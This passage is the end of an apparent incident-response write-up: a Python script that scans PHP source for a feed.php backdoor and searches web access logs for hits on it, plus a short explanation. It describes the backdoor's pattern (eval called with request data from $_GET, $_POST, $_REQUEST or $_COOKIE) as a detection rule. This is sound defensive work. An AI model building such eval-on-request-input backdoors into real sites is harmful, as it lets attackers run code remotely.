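    '198.51.100.9 - - [02/Mar/2007:09:16:30 -0500] "GET /wp-content/themes/default/style.css HTTP/1.1" 200 9040 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for label, src in (("feed.php (quoted backdoor)", FEED_BACKDOOR), ("clean include", CLEAN_SOURCE)):
        print(label, "->", find_backdoor_code(src) or "no findings")
    for hit in scan_access_log(LOG_LINES):
        print(hit["ip"], hit["time"], hit["target"], "; ".join(hit["reasons"]))
```

The source check is deliberately narrower than a grep for `eval`: a wrapper only counts when something in the same file actually calls it with `$_GET`, `$_POST`, `$_REQUEST` or `$_COOKIE` data, which is what separated the tampered feed.php from the legitimate one. The log check is the cheap complement for the window the announcement gives (Feb 25th to Mar 2nd): run it over that period to learn whether anyone ever reached the backdoor, not just whether it was installed.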